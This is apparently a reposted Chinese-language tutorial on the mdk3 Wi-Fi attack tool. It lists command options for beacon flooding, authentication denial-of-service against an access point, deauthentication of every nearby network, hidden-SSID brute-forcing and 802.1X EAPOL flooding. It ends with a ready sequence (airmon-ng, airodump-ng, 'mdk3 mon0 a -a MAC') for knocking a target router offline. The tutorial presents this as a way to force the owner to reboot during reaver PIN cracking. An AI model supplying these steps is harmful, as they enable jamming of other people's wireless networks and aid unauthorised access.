——虽然这几句话被转了N遍,但我们还是以这句话开头;今天就围绕以上提到的几种攻击模式进行简单的折腾下:
首先激活无线网卡至监听模式,然后输入mdk3 --fullhelp查看详细帮助内容
beacon flood mode:
这个模式可以产生大量死亡SSID来充斥无线客户端的无线列表,从而扰乱无线使用者;我们甚至还可以自定义发送死亡SSID的BSSID和ESSID、加密方式(如wep/wpa2)等。
详细命令如下:
mdk3 mon0 b
-n <ssid> #自定义ESSID
-f <filename> #读取ESSID列表文件
-v <filename> #自定义ESSID和BSSID对应列表文件
-d #自定义为Ad-Hoc模式
-w #自定义为wep模式
-g #54Mbit模式
-t# WPA TKIP encryption
-a #WPA AES encryption
-m #读取数据库的mac地址
-c <chan> #自定义信道
-s <pps> #发包速率
mdk3 --help b #查看详细内容
Authentication DoS:
这是一种验证请求攻击模式:在这个模式里,软件自动模拟随机产生的mac向目标AP发起大量验证请求,可以导致AP忙于处理过多的请求而停止对正常连接客户端的响应;这个模式常见的使用是在reaver穷据路由PIN码,当遇到AP被“pin死”时,可以用这个模式来直接让AP停止正常响应,迫使AP主人重启路由!
mdk3 mon0 a
-a <ap_mac> #测试指定BSSID
-m #使用有效数据库中的客户端mac地址
-c #对应 -a ,不检查是否测试成功
-i <ap_mac> #对指定BSSID进行智能攻击
-s <pps> #速率,默认50
Deauthentication/Disassociation Amok:
这个模式看名称就知道大概了:强制解除验证解除连接!在这个模式下,软件会向周围所有可见AP发起循环攻击......可以造成一定范围内的无线网络瘫痪(当然有白名单,黑名单模式),直到手动停止攻击!
mdk3 mon0 d
-w <filename>#白名单mac地址列表文件
-b <filename> #黑名单mac地址列表文件
-s <pps> #速率,这个模式下默认无限制
-c [chan,chan,chan,...] #信道,可以多填,如 2,4,5,1
Basic probing and ESSID Bruteforce mode:
基本探测AP信息和ESSID猜解模式
mdk3 mon0 p
-e <ssid> #待检测的ssid
-f <filename> #检测AP设置为隐藏的ssid列表文件
-t <bssid> #用bssid检测AP的信息
-s <pps> #速率,默认300
-b <character set> #设置字符集
802.1X tests:
802.1X 协议下的攻击测试
mdk3 mon0 x
0 - EAPOL Start packet flooding #EAPOL格式的报文洪水攻击
-n <ssid>
-t <bssid> #目标客户端的mac地址
-w <WPA type>
Set WPA type (1: WPA, 2: WPA2/RSNdefault: WPA)
-u <unicast cipher>
Set unicast cipher type (1: TKIP, 2: CCMPdefault: TKIP)
-m <multicast cipher>
Set multicast cipher type (1: TKIP, 2: CCMPdefault: TKIP)
-s <pps> #速率,默认400
1 - EAPOL Logoff test #注销认证攻击
-t <bssid> #目标客户端的mac地址
-c <bssid>#目标ap的合法客户端mac
-s <pps>#速率,默认400
打开类似windows的cmd的命令符界面,依次输入ifconfig -aifconfig wlan0 up
airmon-ng start wlan0
airodump-ng mon0
mdk3 mon0 a -a MAC 即可
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)